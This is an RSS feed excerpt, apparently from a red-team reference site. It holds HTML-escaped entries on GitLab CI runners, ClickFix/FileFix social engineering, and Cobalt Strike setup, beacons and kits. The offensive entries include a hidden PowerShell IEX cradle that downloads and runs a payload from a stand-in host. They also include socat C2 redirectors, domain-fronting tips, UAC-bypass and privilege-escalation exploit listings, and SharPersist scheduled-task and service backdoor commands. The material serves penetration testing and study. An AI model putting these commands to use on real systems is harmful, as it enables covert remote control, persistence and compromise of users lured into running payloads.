&lt;p&gt;The configuration files for GH actions are located in the directory &lt;code&gt;.github/workflows/&lt;/code&gt;&lt;/p&gt;</description></item><item><title>CI/CD - Gitlab CI</title><link>https://bokkapig.pages.dev/refs/internal/devops/cicd-gitlab-ci/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/devops/cicd-gitlab-ci/</guid><description>&lt;p&gt;GitLab CI (Continuous Integration) is a built-in feature of GitLab that automates the process of building, testing, and deploying your code every time you make a change. It&amp;rsquo;s part of GitLab CI/CD, which stands for Continuous Integration / Continuous Deployment.&lt;/p&gt;
&lt;h2 id="gitlab-runners" class="anchored-heading"&gt;Gitlab Runners&lt;a class="heading-anchor" href="#gitlab-runners" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="nb"&gt;apt-get&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="nb"&gt;gitlab-runner&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="nb"&gt;gitlab-runner&lt;/span&gt; &lt;span class="n"&gt;register&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Prompt&lt;/th&gt;
 &lt;th&gt;Example Input&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;GitLab instance URL&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;https://gitlab.com/&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Registration token&lt;/td&gt;
 &lt;td&gt;Found in your project under &lt;code&gt;Settings &amp;gt; CI/CD &amp;gt; Runners&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Executor&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;shell&lt;/code&gt;, &lt;code&gt;docker&lt;/code&gt;, etc.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Description&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;my-remote-runner&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Tags&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;remote&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;The &lt;code&gt;.gitlab-ci.yml&lt;/code&gt; file is the configuration file that GitLab CI/CD uses to define your pipelines, jobs, and stages.&lt;/p&gt;</description></item><item><title>ClickFix</title><link>https://bokkapig.pages.dev/refs/internal/redteam/access/clickfix/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/access/clickfix/</guid><description>&lt;blockquote&gt;
&lt;p&gt;ClickFix is a social engineering attack that prompts users to unknowingly execute malicious code, usually through the Run Dialog (&lt;code&gt;Windows Key + R&lt;/code&gt;).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="filefix" class="anchored-heading"&gt;FileFix&lt;a class="heading-anchor" href="#filefix" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Display a message to the user to lure him into copying and pasting a command in a shell or equivalent (File Explorer).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;To&lt;/span&gt; &lt;span class="n"&gt;access&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;follow&lt;/span&gt; &lt;span class="n"&gt;these&lt;/span&gt; &lt;span class="n"&gt;steps&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="nb"&gt;Copy &lt;/span&gt;&lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;file&lt;/span&gt; &lt;span class="n"&gt;path&lt;/span&gt; &lt;span class="n"&gt;below&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;`&lt;/span&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;company&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="nb"&gt;internal-secure&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;filedrive&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;HRPolicy&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;docx&lt;/span&gt;&lt;span class="p"&gt;`&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mf"&gt;2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="n"&gt;Open&lt;/span&gt; &lt;span class="n"&gt;File&lt;/span&gt; &lt;span class="n"&gt;Explorer&lt;/span&gt; &lt;span class="n"&gt;and&lt;/span&gt; &lt;span class="nb"&gt;select &lt;/span&gt;&lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;address&lt;/span&gt; &lt;span class="n"&gt;bar&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;CTRL&lt;/span&gt; &lt;span class="p"&gt;+&lt;/span&gt; &lt;span class="n"&gt;L&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mf"&gt;3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="n"&gt;Paste&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;file&lt;/span&gt; &lt;span class="n"&gt;path&lt;/span&gt; &lt;span class="n"&gt;and&lt;/span&gt; &lt;span class="n"&gt;press&lt;/span&gt; &lt;span class="n"&gt;Enter&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When the user clicks on the &amp;ldquo;COPY&amp;rdquo; button, it should set the content of his clipboard to the following.&lt;/p&gt;</description></item><item><title>Cobalt Strike</title><link>https://bokkapig.pages.dev/refs/internal/command-control/cobalt-strike/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/command-control/cobalt-strike/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Cobalt Strike is threat emulation software. Red teams and penetration testers use Cobalt Strike to demonstrate the risk of a breach and evaluate mature security programs. Cobalt Strike exploits network vulnerabilities, launches spear phishing campaigns, hosts web drive-by attacks, and generates malware infected files from a powerful graphical user interface that encourages collaboration and reports all activity.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="nb"&gt;apt-get&lt;/span&gt; &lt;span class="n"&gt;update&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="nb"&gt;apt-get&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;openjdk&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;11&lt;/span&gt;&lt;span class="n"&gt;-jdk&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="n"&gt;apt&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;proxychains&lt;/span&gt; &lt;span class="n"&gt;socat&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="nb"&gt;update-java&lt;/span&gt;&lt;span class="n"&gt;-alternatives&lt;/span&gt; &lt;span class="n"&gt;-s&lt;/span&gt; &lt;span class="n"&gt;java&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1.11&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;0&lt;/span&gt;&lt;span class="n"&gt;-openjdk-amd64&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;teamserver&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;password&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="no"&gt;malleable C2 profile&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;cobaltstrike&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;powershell&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;-nop&lt;/span&gt; &lt;span class="n"&gt;-w&lt;/span&gt; &lt;span class="n"&gt;hidden&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;IEX ((new-object net.webclient).downloadstring(&amp;#39;http://campaigns.example.com/download/dnsback&amp;#39;))&amp;#34;&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#infrastructure"&gt;Infrastructure&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#redirectors"&gt;Redirectors&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#domain-fronting"&gt;Domain fronting&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#opsec"&gt;OpSec&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#customer-id"&gt;Customer ID&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#malleable-c2"&gt;Malleable C2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#files"&gt;Files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#powershell-and-net"&gt;Powershell and .NET&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#powershell-commands"&gt;Powershell commabds&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#net-remote-execution"&gt;.NET remote execution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#lateral-movement"&gt;Lateral Movement&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#vpn--pivots"&gt;VPN &amp;amp; Pivots&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#beacon-object-files"&gt;Beacon Object Files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ntlm-relaying-via-cobalt-strike"&gt;NTLM Relaying via Cobalt Strike&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="infrastructure" class="anchored-heading"&gt;Infrastructure&lt;a class="heading-anchor" href="#infrastructure" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="redirectors" class="anchored-heading"&gt;Redirectors&lt;a class="heading-anchor" href="#redirectors" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="n"&gt;apt&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;socat&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;socat&lt;/span&gt; &lt;span class="nb"&gt;TCP4-LISTEN&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;80&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;fork&lt;/span&gt; &lt;span class="n"&gt;TCP4&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="no"&gt;TEAM SERVER&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;80&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="domain-fronting" class="anchored-heading"&gt;Domain Fronting&lt;a class="heading-anchor" href="#domain-fronting" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;New Listener &amp;gt; HTTP Host Header&lt;/li&gt;
&lt;li&gt;Choose a domain in &amp;ldquo;Finance &amp;amp; Healthcare&amp;rdquo; sector&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="opsec" class="anchored-heading"&gt;OpSec&lt;a class="heading-anchor" href="#opsec" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Don&amp;rsquo;t&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>Cobalt Strike - Beacons</title><link>https://bokkapig.pages.dev/refs/internal/command-control/cobalt-strike-beacons/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/command-control/cobalt-strike-beacons/</guid><description>&lt;h2 id="dns-beacon" class="anchored-heading"&gt;DNS Beacon&lt;a class="heading-anchor" href="#dns-beacon" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="dns-configuration" class="anchored-heading"&gt;DNS Configuration&lt;a class="heading-anchor" href="#dns-configuration" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Edit the &lt;code&gt;Zone File&lt;/code&gt; for the domain&lt;/li&gt;
&lt;li&gt;Create an &lt;code&gt;A record&lt;/code&gt; for Cobalt Strike system&lt;/li&gt;
&lt;li&gt;Create an &lt;code&gt;NS record&lt;/code&gt; that points to FQDN of your Cobalt Strike system&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Your Cobalt Strike team server system must be authoritative for the domains you specify. Create a &lt;code&gt;DNS A&lt;/code&gt; record and point it to your Cobalt Strike team server. Use &lt;code&gt;DNS NS&lt;/code&gt; records to delegate several domains or sub-domains to your Cobalt Strike team server&amp;rsquo;s &lt;code&gt;A&lt;/code&gt; record.&lt;/p&gt;</description></item><item><title>Cobalt Strike - Kits</title><link>https://bokkapig.pages.dev/refs/internal/command-control/cobalt-strike-kits/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/command-control/cobalt-strike-kits/</guid><description>&lt;ul&gt;
&lt;li&gt;&lt;a href="https://cobalt-strike.github.io/community_kit/"&gt;Cobalt Strike Community Kit&lt;/a&gt; - Community Kit is a central repository of extensions written by the user community to extend the capabilities of Cobalt Strike&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="elevate-kit" class="anchored-heading"&gt;Elevate Kit&lt;a class="heading-anchor" href="#elevate-kit" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;UAC Token Duplication : Fixed in Windows 10 Red Stone 5 (October 2018)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;beacon&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;runasadmin&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Beacon&lt;/span&gt; &lt;span class="n"&gt;Command&lt;/span&gt; &lt;span class="n"&gt;Elevators&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;========================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;Exploit&lt;/span&gt; &lt;span class="n"&gt;Description&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;-------&lt;/span&gt; &lt;span class="p"&gt;-----------&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;ms14&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;058&lt;/span&gt; &lt;span class="n"&gt;TrackPopupMenu&lt;/span&gt; &lt;span class="n"&gt;Win32k&lt;/span&gt; &lt;span class="n"&gt;NULL&lt;/span&gt; &lt;span class="n"&gt;Pointer&lt;/span&gt; &lt;span class="n"&gt;Dereference&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;CVE&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2014&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;4113&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;ms15&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;051&lt;/span&gt; &lt;span class="n"&gt;Windows&lt;/span&gt; &lt;span class="n"&gt;ClientCopyImage&lt;/span&gt; &lt;span class="n"&gt;Win32k&lt;/span&gt; &lt;span class="n"&gt;Exploit&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;CVE&lt;/span&gt; &lt;span class="mf"&gt;2015&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1701&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;ms16&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;016&lt;/span&gt; &lt;span class="n"&gt;mrxdav&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;sys&lt;/span&gt; &lt;span class="n"&gt;WebDav&lt;/span&gt; &lt;span class="n"&gt;Local&lt;/span&gt; &lt;span class="n"&gt;Privilege&lt;/span&gt; &lt;span class="n"&gt;Escalation&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;CVE&lt;/span&gt; &lt;span class="mf"&gt;2016&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;0051&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nb"&gt;svc-exe&lt;/span&gt; &lt;span class="n"&gt;Get&lt;/span&gt; &lt;span class="n"&gt;SYSTEM&lt;/span&gt; &lt;span class="n"&gt;via&lt;/span&gt; &lt;span class="n"&gt;an&lt;/span&gt; &lt;span class="n"&gt;executable&lt;/span&gt; &lt;span class="n"&gt;run&lt;/span&gt; &lt;span class="n"&gt;as&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="n"&gt;service&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nb"&gt;uac-schtasks&lt;/span&gt; &lt;span class="n"&gt;Bypass&lt;/span&gt; &lt;span class="n"&gt;UAC&lt;/span&gt; &lt;span class="n"&gt;with&lt;/span&gt; &lt;span class="n"&gt;schtasks&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;via&lt;/span&gt; &lt;span class="n"&gt;SilentCleanup&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nb"&gt;uac-token&lt;/span&gt;&lt;span class="n"&gt;-duplication&lt;/span&gt; &lt;span class="n"&gt;Bypass&lt;/span&gt; &lt;span class="n"&gt;UAC&lt;/span&gt; &lt;span class="n"&gt;with&lt;/span&gt; &lt;span class="n"&gt;Token&lt;/span&gt; &lt;span class="n"&gt;Duplication&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="persistence-kit" class="anchored-heading"&gt;Persistence Kit&lt;a class="heading-anchor" href="#persistence-kit" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/0xthirteen/MoveKit"&gt;0xthirteen/MoveKit&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/fireeye/SharPersist"&gt;fireeye/SharPersist&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# List persistences&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;SharPersist&lt;/span&gt; &lt;span class="n"&gt;-t&lt;/span&gt; &lt;span class="n"&gt;schtaskbackdoor&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="n"&gt;list&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;SharPersist&lt;/span&gt; &lt;span class="n"&gt;-t&lt;/span&gt; &lt;span class="n"&gt;startupfolder&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="n"&gt;list&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;SharPersist&lt;/span&gt; &lt;span class="n"&gt;-t&lt;/span&gt; &lt;span class="n"&gt;schtask&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="n"&gt;list&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Add a persistence&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;SharPersist&lt;/span&gt; &lt;span class="n"&gt;-t&lt;/span&gt; &lt;span class="n"&gt;schtaskbackdoor&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;C:\Windows\System32\cmd.exe&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-a&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;/c calc.exe&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-n&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Something Cool&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="n"&gt;add&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;SharPersist&lt;/span&gt; &lt;span class="n"&gt;-t&lt;/span&gt; &lt;span class="n"&gt;schtaskbackdoor&lt;/span&gt; &lt;span class="n"&gt;-n&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Something Cool&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="n"&gt;remove&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;SharPersist&lt;/span&gt; &lt;span class="n"&gt;-t&lt;/span&gt; &lt;span class="n"&gt;service&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;C:\Windows\System32\cmd.exe&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-a&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;/c calc.exe&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-n&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Some Service&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="n"&gt;add&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;SharPersist&lt;/span&gt; &lt;span class="n"&gt;-t&lt;/span&gt; &lt;span class="n"&gt;service&lt;/span&gt; &lt;span class="n"&gt;-n&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Some Service&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="n"&gt;remove&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;SharPersist&lt;/span&gt; &lt;span class="n"&gt;-t&lt;/span&gt; &lt;span class="n"&gt;schtask&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;C:\Windows\System32\cmd.exe&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-a&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;/c calc.exe&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-n&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Some Task&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="n"&gt;add&lt;/span&gt;
